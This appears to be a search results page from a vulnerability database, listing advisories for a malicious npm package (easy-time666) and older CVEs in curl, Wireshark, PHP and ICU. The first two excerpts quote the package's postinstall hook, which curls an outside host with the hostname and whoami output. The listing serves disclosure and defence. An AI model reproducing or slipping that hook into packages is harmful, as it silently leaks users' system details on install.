Lucene search
K

11 matches found

OSV
OSV
added 2026/06/13 12:23 p.m.11 views

MAL-2026-5749 Malicious code in easy-time666 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 57bc31746af3bff6006bfe2da34cd0fb223a4bd9e867abddd172be5018821c22 package.json declares a postinstall hook that runs curl http://npm.wdf1.eyes.sh/pre?h=$hostname&u=&whoami over plain HTTP on every npm install, leaki...

5.9AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/13 12:23 p.m.16 views

Malicious code in easy-time666 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 57bc31746af3bff6006bfe2da34cd0fb223a4bd9e867abddd172be5018821c22 package.json declares a postinstall hook that runs curl http://npm.wdf1.eyes.sh/pre?h=$hostname&u=&whoami over plain HTTP on every npm install, leaki...

5.9AI score
Exploits0References2
OSV
OSV
added 2026/04/19 11:50 a.m.8 views

CLSA-2026-1776599416 curl: Fix of CVE-2024-7264

CVE-2024-7264: fix ASN.1 GTime2str heap buffer over-read caused by off-by-one in fractional seconds length calculation...

6.5CVSS5.9AI score0.16212EPSS
Exploits1References1
OSV
OSV
added 2025/06/28 6:23 p.m.9 views

CLSA-2025-1751135005 curl: Fix of CVE-2024-7264

CVE-2024-7264: fix out-of-bound read in GTime2str function...

6.5CVSS6.8AI score0.16212EPSS
Exploits1References1
Spring Security Advisories
Spring Security Advisories
added 2024/11/19 12:0 a.m.50 views

This Week in Spring - November 19th, 2024

Hi, Spring fans! How are you? Can you believe we're already staring at the end of the month? It's that time of the year when we see new releases, and the new releases reflect that frenzy! Soon: Spring Boot 3.4.0! Are you updated? Make sure you're updated! Remember: Spring projects leave open sour...

5.3CVSS6.8AI score0.00729EPSS
Exploits0
SUSE CVE
SUSE CVE
added 2023/02/15 6:1 a.m.3 views

SUSE CVE-2009-4378

The IPMI dissector in Wireshark 1.2.0 through 1.2.4 on Windows allows remote attackers to cause a denial of service crash via a crafted packet, related to "formatting a date/time using strftime."...

4.3CVSS6.8AI score0.02308EPSS
Exploits1References3
Fedora
Fedora
added 2014/06/10 3:9 a.m.32 views

[SECURITY] Fedora 19 Update: mingw-icu-50.1.2-3.fc19

ICU is a set of C and C++ libraries that provides robust and full-featured Unicode and locale support. The library provides calendar support, conversions for many character sets, language sensitive collation, date and time formatting, support for many locales, message catalogs and resources,...

7.5CVSS1AI score0.02531EPSS
Exploits0
0day.today
0day.today
added 2010/12/11 12:0 a.m.67 views

PHP 5.3.3 NumberFormatter::getSymbol Integer Overflow

Exploit for multiple platform in category dos / poc From: Maksymilian Arciemowicz Date: Fri, 10 Dec 2010 14:43:32 +0100 -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 PHP 5.3.3 NumberFormatter::getSymbol Integer Overflow Author: Maksymilian Arciemowicz http://securityreason.com/ http://cxib.net/...

7.1AI score0.18878EPSS
Exploits5
Packet Storm
Packet Storm
added 2010/12/10 12:0 a.m.76 views

PHP 5.3.3 Integer Overflow

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 PHP 5.3.3 NumberFormatter::getSymbol Integer Overflow Author: Maksymilian Arciemowicz http://securityreason.com/ http://cxib.net/ Date: - - Dis.: 11.11.2010 - - Pub.: 10.12.2010 CERT: VU479900 CVE: CVE-2010-4409 CWE: CWE-189 Status: Fixed in PHP 5.3.4...

5CVSS0.4AI score0.18878EPSS
Exploits5
exploitpack
exploitpack
added 2010/12/10 12:0 a.m.73 views

PHP 5.3.3 - NumberFormatter::getSymbol Integer Overflow

PHP 5.3.3 - NumberFormatter::getSymbol Integer Overflow From: Maksymilian Arciemowicz Date: Fri, 10 Dec 2010 14:43:32 +0100 -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 PHP 5.3.3 NumberFormatter::getSymbol Integer Overflow Author: Maksymilian Arciemowicz http://securityreason.com/ http://cxib.ne...

5CVSS0.4AI score0.18878EPSS
Exploits5
UbuntuCve
UbuntuCve
added 2009/12/21 9:30 p.m.32 views

CVE-2009-4378

The IPMI dissector in Wireshark 1.2.0 through 1.2.4 on Windows allows remote attackers to cause a denial of service crash via a crafted packet, related to "formatting a date/time using strftime."...

4.3CVSS5.9AI score0.02308EPSS
Exploits1References1
Rows per page
Query Builder